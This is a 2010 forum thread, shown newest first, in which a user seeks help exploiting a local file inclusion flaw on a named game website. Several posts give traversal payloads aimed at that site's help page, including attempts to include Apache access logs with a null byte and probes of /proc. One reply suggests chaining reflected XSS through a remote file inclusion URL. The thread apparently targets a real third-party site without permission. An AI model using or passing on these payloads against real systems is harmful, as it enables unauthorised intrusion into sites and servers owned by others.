Help with LFI

Re: Help with LFI

RonPaul — Tue, 02 Mar 2010 17:09:44 -0600

URLs are disabled
:(

Re: Help with LFI

Reiners — Tue, 02 Mar 2010 10:37:21 -0600

your XSS payload will reflect in your browser, but not when PHP is parsing the script. if you want to use XSS with LFI, you need to use a URL with your XSS payload as LFI payload:

/main/help/index.php?topic=http://url/index.php?account='">

http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/

Re: Help with LFI

RonPaul — Mon, 01 Mar 2010 19:37:05 -0600

sorry just realized i posted in the wrong section
thanks lightos, but it seems like i cant include anything useful like access/error/ logs or /proc. and i cant upload an image shell like as an avatar

so i found XSS on signup.php
and have been trying to do this
hxxp://www.worldofarmaggedon.com/main/help/index.php?signup=&account='">&topic=.././.././signup

but all i get is the in the html

any more help would be great, thx

hxxp://www.worldofarmaggedon.com/main/help/index.php?topic=.././.././.././.././apache/logs/access.log%00
gives me open_basedir restriction in effect

Re: Help with LFI

lightos — Fri, 19 Feb 2010 11:32:13 -0600

topic=.././.././index

Help with LFI

RonPaul — Thu, 18 Feb 2010 17:14:31 -0600

I dont know why i always get the hard ones
hxxp://www.worldofarmaggedon.com/main/help/index.php?topic='

if i put 2 sets of ../ together it causes a 406
ive tried data and other items suggested before

thanks in advance